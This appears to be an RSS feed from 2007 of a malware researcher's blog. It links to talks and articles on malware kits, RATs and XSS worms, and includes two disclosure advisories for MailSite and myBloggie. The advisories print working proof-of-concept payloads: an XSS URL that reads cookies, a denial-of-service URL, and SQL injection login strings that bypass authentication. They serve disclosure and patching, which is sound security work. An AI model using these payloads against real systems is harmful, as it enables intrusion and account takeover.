<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>News from the Lab</title>
	<atom:link href="http://rahulmohandas.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://rahulmohandas.wordpress.com</link>
	<description></description>
	<lastBuildDate>Mon, 10 Dec 2007 10:20:42 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='rahulmohandas.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/7a431f037a88e22658002c9740321569?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>News from the Lab</title>
		<link>http://rahulmohandas.wordpress.com</link>
	</image>
			<item>
		<title>ClubHack 2007: Analysis of Adversarial Code &#8211; The Role of Malware Kits</title>
		<link>http://rahulmohandas.wordpress.com/2007/12/10/clubhack-2007-analysis-of-adversarial-code-the-role-of-malware-kits/</link>
		<comments>http://rahulmohandas.wordpress.com/2007/12/10/clubhack-2007-analysis-of-adversarial-code-the-role-of-malware-kits/#comments</comments>
		<pubDate>Mon, 10 Dec 2007 10:06:42 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Malware Research]]></category>
		<category><![CDATA[Technical Papers]]></category>
		<category><![CDATA[Vulnerability Research]]></category>
		<category><![CDATA[ClubHack 2007 Rahul Mohandas Vulnerability Research Sec]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/12/10/clubhack-2007-analysis-of-adversarial-code-the-role-of-malware-kits/</guid>
		<description><![CDATA[Just  came back from Pune after Presenting at ClubHack 2007. It was such a great initiative to promote security awareness in India. I talked about the recent trend in the emergence of kits like MPack and how attackers are exploiting them to install various Malware. You can find my slides below:


    [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=15&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Just  came back from Pune after Presenting at ClubHack 2007. It was such a great initiative to promote security awareness in India. I talked about the recent trend in the emergence of kits like MPack and how attackers are exploiting them to install various Malware. You can find my slides below:</p>
<p><a href="http://rahulmohandas.wordpress.com/2007/12/10/clubhack-2007-analysis-of-adversarial-code-the-role-of-malware-kits/clubhack-2007/" target="_blank" rel="attachment wp-att-16" title="ClubHack 2007"><img src="http://rahulmohandas.files.wordpress.com/2007/12/clubhack2007.thumbnail.gif" alt="ClubHack 2007" /></a></p>
<p><object type='application/x-shockwave-flash' wmode='transparent' data='http://static.slideshare.net/swf/ssplayer2.swf?id=198044&#038;doc=analysis-of-adverarial-code-the-role-of-malware-kits-1197279486187101-2' width='650' height='533'><param name='movie' value='http://static.slideshare.net/swf/ssplayer2.swf?id=198044&#038;doc=analysis-of-adverarial-code-the-role-of-malware-kits-1197279486187101-2' /><param name='allowFullScreen' value='true' /><param name='allowScriptAccess' value='always' /></object></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/15/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/15/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=15&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2007/12/10/clubhack-2007-analysis-of-adversarial-code-the-role-of-malware-kits/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>

		<media:content url="http://rahulmohandas.files.wordpress.com/2007/12/clubhack2007.thumbnail.gif" medium="image">
			<media:title type="html">ClubHack 2007</media:title>
		</media:content>
	</item>
		<item>
		<title>AntiSpyStorm: Fake Microsoft AntiSpyware Center pushing Adware !</title>
		<link>http://rahulmohandas.wordpress.com/2007/10/14/antispystorm-fake-microsoft-antispyware-center-pushing-adware/</link>
		<comments>http://rahulmohandas.wordpress.com/2007/10/14/antispystorm-fake-microsoft-antispyware-center-pushing-adware/#comments</comments>
		<pubDate>Sun, 14 Oct 2007 07:59:59 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Malware Research]]></category>
		<category><![CDATA[My Blogs]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/14/antispystorm-fake-microsoft-antispyware-center-pushing-adware/</guid>
		<description><![CDATA[Another blog which highlights the new-age social engineering techniques to spoof a user into installing adwares and spywares.
More here:
http://www.avertlabs.com/research/blog/index.php/2007/10/11/
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=14&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Another blog which highlights the new-age social engineering techniques to spoof a user into installing adwares and spywares.</p>
<p>More here:</p>
<p><a href="http://www.avertlabs.com/research/blog/index.php/2007/10/11/antispystorm-fake-microsoft-antispyware-center-pushing-adware/" target="_blank">http://www.avertlabs.com/research/blog/index.php/2007/10/11/</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=14&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2007/10/14/antispystorm-fake-microsoft-antispyware-center-pushing-adware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>SharK2: Trojan Creation Made Easy!</title>
		<link>http://rahulmohandas.wordpress.com/2007/10/13/shark2-trojan-creation-made-easy/</link>
		<comments>http://rahulmohandas.wordpress.com/2007/10/13/shark2-trojan-creation-made-easy/#comments</comments>
		<pubDate>Sat, 13 Oct 2007 21:14:22 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Malware Research]]></category>
		<category><![CDATA[My Blogs]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/shark2-trojan-creation-made-easy/</guid>
		<description><![CDATA[This blog talks about Shark2 DIY kit and how the remote access trojans has evolved from infamous Back Orifice to the recent RATS with stealth and virtual machine detection features along with the advancement in user-friendly GUI&#8217;s.
More here:
http://www.avertlabs.com/research/blog/index.php/2007/08/21/shark2-trojan-creation-made-easy/
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=11&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>This blog talks about Shark2 DIY kit and how the remote access trojans has evolved from infamous Back Orifice to the recent RATS with stealth and virtual machine detection features along with the advancement in user-friendly GUI&#8217;s.</p>
<p>More here:</p>
<p><a href="http://www.avertlabs.com/research/blog/index.php/2007/08/21/shark2-trojan-creation-made-easy/" target="_blank">http://www.avertlabs.com/research/blog/index.php/2007/08/21/shark2-trojan-creation-made-easy/</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/11/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/11/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/11/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=11&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2007/10/13/shark2-trojan-creation-made-easy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>The Nduja Job: Into The World Of XSS Worms</title>
		<link>http://rahulmohandas.wordpress.com/2007/10/13/the-nduja-job-into-the-world-of-xss-worms/</link>
		<comments>http://rahulmohandas.wordpress.com/2007/10/13/the-nduja-job-into-the-world-of-xss-worms/#comments</comments>
		<pubDate>Sat, 13 Oct 2007 21:06:28 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Malware Research]]></category>
		<category><![CDATA[My Blogs]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/the-nduja-job-into-the-world-of-xss-worms/</guid>
		<description><![CDATA[In this blog i talk about the history of  XSS worms, how they evolved to spread through multiple webmail providers and the client-server model involved in a XSS botnet.
More here:
http://www.avertlabs.com/research/blog/index.php/2007/07/19/the-nduja-job-into-the-world-of-xss-worms/
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=10&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>In this blog i talk about the history of  XSS worms, how they evolved to spread through multiple webmail providers and the client-server model involved in a XSS botnet.</p>
<p>More here:</p>
<p><a href="http://www.avertlabs.com/research/blog/index.php/2007/07/19/the-nduja-job-into-the-world-of-xss-worms/" target="_blank">http://www.avertlabs.com/research/blog/index.php/2007/07/19/the-nduja-job-into-the-world-of-xss-worms/</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/10/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/10/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/10/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=10&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2007/10/13/the-nduja-job-into-the-world-of-xss-worms/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking the Malware– A reverse-engineer’s analysis</title>
		<link>http://rahulmohandas.wordpress.com/2006/10/16/hacking-the-malware%e2%80%93-a-reverse-engineer%e2%80%99s-analysis/</link>
		<comments>http://rahulmohandas.wordpress.com/2006/10/16/hacking-the-malware%e2%80%93-a-reverse-engineer%e2%80%99s-analysis/#comments</comments>
		<pubDate>Mon, 16 Oct 2006 20:42:39 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Malware Research]]></category>
		<category><![CDATA[Technical Papers]]></category>
		<category><![CDATA[Vulnerability Research]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/hacking-the-malware%e2%80%93-a-reverse-engineer%e2%80%99s-analysis/</guid>
		<description><![CDATA[ABSTRACT
This paper attempts to document an approach on how the hackers make use of the vulnerabilities to install malicious software on the vulnerable machine. A comprehensive reverse code engineered analysis of the malicious software (Win32.Qucan.a) and the various protection schemes against the worm by various security products are also discussed.
I hope this document will help [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=8&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p align="center">ABSTRACT</p>
<p>This paper attempts to document an approach on how the hackers make use of the vulnerabilities to install malicious software on the vulnerable machine. A comprehensive reverse code engineered analysis of the malicious software (Win32.Qucan.a) and the various protection schemes against the worm by various security products are also discussed.</p>
<p>I hope this document will help the Malware researchers, Intrusion Analysts and other Security professionals to conduct a more viable and comprehensive research.</p>
<p>The complete paper can be downloaded from<br />
<a href="http://geocities.com/rahulmohandas/hacking_the_malware.pdf" target="_blank">http://geocities.com/rahulmohandas/hacking_the_malware.pdf</a></p>
<p>MD5: F875DADCAD00792D753CC96BD57E0F72</p>
<p>or</p>
<p><a href="http://websamba.com/forever_rahul/hacking_the_malware.zip" target="_blank">http://websamba.com/forever_rahul/hacking_the_malware.zip</a><br />
MD5(zip file): 5562F1A86DDC447A14D7763FF4C8D85D</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/8/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/8/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/8/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=8&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2006/10/16/hacking-the-malware%e2%80%93-a-reverse-engineer%e2%80%99s-analysis/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>RockLiffe MailSite wconsole.dll Denial of Service/Script Injection Vulnerability</title>
		<link>http://rahulmohandas.wordpress.com/2006/01/11/rockliffe-mailsite-wconsoledll-denial-of-servicescript-injection-vulnerability/</link>
		<comments>http://rahulmohandas.wordpress.com/2006/01/11/rockliffe-mailsite-wconsoledll-denial-of-servicescript-injection-vulnerability/#comments</comments>
		<pubDate>Wed, 11 Jan 2006 20:38:20 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Vulnerability Research]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/rockliffe-mailsite-wconsoledll-denial-of-servicescript-injection-vulnerability/</guid>
		<description><![CDATA[OS2A ID: OS2A_1004 Status
01/06/2006 Issue Discovered
01/06/2006 Reported to the vendor
01/19/2006 Patch Released
01/20/2006 Advisory Released
Class: Denial of Service / Script Injection Severity: CRITICAL
Overview:
Rockliffe&#8217;s MailSite is a program for providing access to email
accounts on Microsoft Windows operating systems. MailSite HTTP Mail management
agent could allow a remote attacker to cause a denial of service or
execute arbitrary script code.
Description:
1. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=7&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>OS2A ID: OS2A_1004 Status<br />
01/06/2006 Issue Discovered<br />
01/06/2006 Reported to the vendor<br />
01/19/2006 Patch Released<br />
01/20/2006 Advisory Released</p>
<p>Class: Denial of Service / Script Injection Severity: CRITICAL</p>
<p>Overview:<br />
Rockliffe&#8217;s MailSite is a program for providing access to email<br />
accounts on Microsoft Windows operating systems. MailSite HTTP Mail management<br />
agent could allow a remote attacker to cause a denial of service or<br />
execute arbitrary script code.</p>
<p>Description:<br />
1. MailSite HTTP Mail management agent 7.0.3.1 version could allow a remote<br />
attacker cause a denial of service. A bug in the input validation routine<br />
in httpma causes the svchost process to consume more CPU cycles thus<br />
impacting Mailsite HTTP Management agent and ultimately crashing the service.</p>
<p>2. MailSite HTTP Mail management agent 6.x and 5.x could allow a remote<br />
attacker to inject arbitrary script code. This vulnerability is caused<br />
due to a design error in the wconsole.dll. This dll file contains html<br />
code embedded in it which is not properly sanitizing the user-input.</p>
<p>Impact:<br />
1. Remote attackers can exploit this issue to trigger a denial of service<br />
condition.<br />
2. An attacker may leverage this issue to have arbitrary script code<br />
executed in the browser in the context of the affected site.</p>
<p>Affected Software(s):<br />
MailSite 7.0.3.1 and prior<br />
MailSite 6.1.22 and prior<br />
MailSite 5.x</p>
<p>Affected platform(s):<br />
Windows (Any)</p>
<p>Exploit/Proof of Concept:<br />
For 7.x series<br />
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?Authenticate|cmd<br />
Any special characters passed to the parameters in the wconsole.dll<br />
triggers denial of service.</p>
<p>For 6.x &amp; 5.x series<br />
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert<br />
(document.cookie)%3C/script%3E</p>
<p>Solution:<br />
For 7.x series apply the following patch.<br />
<a href="ftp://ftp.rockliffe.com/MailSite/Latest/Hotfixes/" target="_blank">ftp://ftp.rockliffe.com/MailSite/Latest/Hotfixes/</a><br />
For 6.x series apply the following patch<br />
<a href="ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/" target="_blank">ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/</a></p>
<p>Reference:<br />
<a href="http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0750.html" target="_blank">http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0750.html</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/7/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/7/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=7&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2006/01/11/rockliffe-mailsite-wconsoledll-denial-of-servicescript-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>myBloggie SQL Injection/Privilege Escalation Vulnerability</title>
		<link>http://rahulmohandas.wordpress.com/2006/01/11/mybloggie-sql-injectionprivilege-escalation-vulnerability/</link>
		<comments>http://rahulmohandas.wordpress.com/2006/01/11/mybloggie-sql-injectionprivilege-escalation-vulnerability/#comments</comments>
		<pubDate>Wed, 11 Jan 2006 20:35:59 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[General Chatter]]></category>
		<category><![CDATA[Vulnerability Research]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/mybloggie-sql-injectionprivilege-escalation-vulnerability/</guid>
		<description><![CDATA[OS2A ID: OS2A_1002
Status
9/1/2005 Issue Discovered
9/2/2005 Reported to the vendor
9/3/2005 Patch Released
9/5/2005 Advisory Released
Class: SQL Injection    Severity: CRITICAL
Overview:
myBloggie is a Weblog system built using PHP &#38; mySQL. myBloggie
versions2.1.3-beta and prior are vulnerable to SQL injection vulnerability
causedby improper validation of user-supplied inputs. This vulnerability
can be exploited to bypass authentication mechanism, escalate the
privileges toadministrator level [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=6&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>OS2A ID: OS2A_1002</p>
<p>Status<br />
9/1/2005 Issue Discovered<br />
9/2/2005 Reported to the vendor<br />
9/3/2005 Patch Released<br />
9/5/2005 Advisory Released</p>
<p>Class: SQL Injection    Severity: CRITICAL</p>
<p>Overview:<br />
myBloggie is a Weblog system built using PHP &amp; mySQL. myBloggie<br />
versions2.1.3-beta and prior are vulnerable to SQL injection vulnerability<br />
causedby improper validation of user-supplied inputs. This vulnerability<br />
can be exploited to bypass authentication mechanism, escalate the<br />
privileges toadministrator level and also made to reveal system<br />
specific information.</p>
<p>Description:<br />
User supplied credential inputs (&#8216;$username&#8217; and &#8216;$passwd&#8217;) are not<br />
sanitized in login.php before subjecting them to SQL query.</p>
<p>&lt;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-login.php snippet&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;&gt;</p>
<p>if (isset($_POST['username'])) {<br />
$username=$_POST['username'];<br />
} else $username=&#8221;";</p>
<p>$result = mysql_query( &#8220;SELECT user FROM &#8220;.USER_TBL.&#8221; WHERE user=<br />
&#8216;$username&#8217;    AND password=&#8217;$passwd&#8217;&#8221; ) or error( mysql_error() );</p>
<p>&lt;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;&gt;</p>
<p>This can be exploited in multiple ways,<br />
1. Authentication Bypass<br />
A malicious user can log on to the weblog system without submitting<br />
thepassword by placing queries such as this &#8220;admin&#8217; OR &#8216;x&#8217;='x&#8221; in<br />
the User Name field.</p>
<p>2. Privilege Escalation.<br />
When a non-administrative user submits, for example &#8220;user1&#8242; OR &#8216;x&#8217;='x&#8221;<br />
into the User Name field, administrative privileges will be granted.</p>
<p>3. Path Disclosure.<br />
Path information can be made to disclose in error pages by passing<br />
invalid query to User Name field of login.php.</p>
<p>Impact:<br />
Successful exploitation can result in a compromise of the application,<br />
disclosure of system specific information, or permit an attacker to<br />
exploit vulnerabilities in the underlying database implementation.<br />
An attacker can also exploit this vulnerability to elevate privileges<br />
within the affected system.</p>
<p>Affected Systems:<br />
myBloggie 2.1.3-beta and prior.<br />
Linux (Any), Unix (Any), Windows (Any)</p>
<p>Exploit:<br />
1. POST http://example.com/mybloggie/login.php?username=admin&#8217; OR<br />
&#8216;x&#8217;='x<br />
2. POST http://example.com/mybloggie/login.php?username=normal_user<br />
&#8216; OR &#8216;one&#8217;='one<br />
3. POST http://example.com/mybloggie/login.php?username=&#8217;1=1 &#8211;</p>
<p>Solution:<br />
Patch: <a href="http://mywebland.com/forums/showtopic.php?t=399" target="_blank">http://mywebland.com/forums/showtopic.php?t=399</a></p>
<p>Reference:<br />
<a href="http://marc.theaimsgroup.com/?l=bugtraq&amp;m=112607358831963&amp;w=2" target="_blank">http://marc.theaimsgroup.com/?l=bugtraq&amp;m=112607358831963&amp;w=2</a></p>
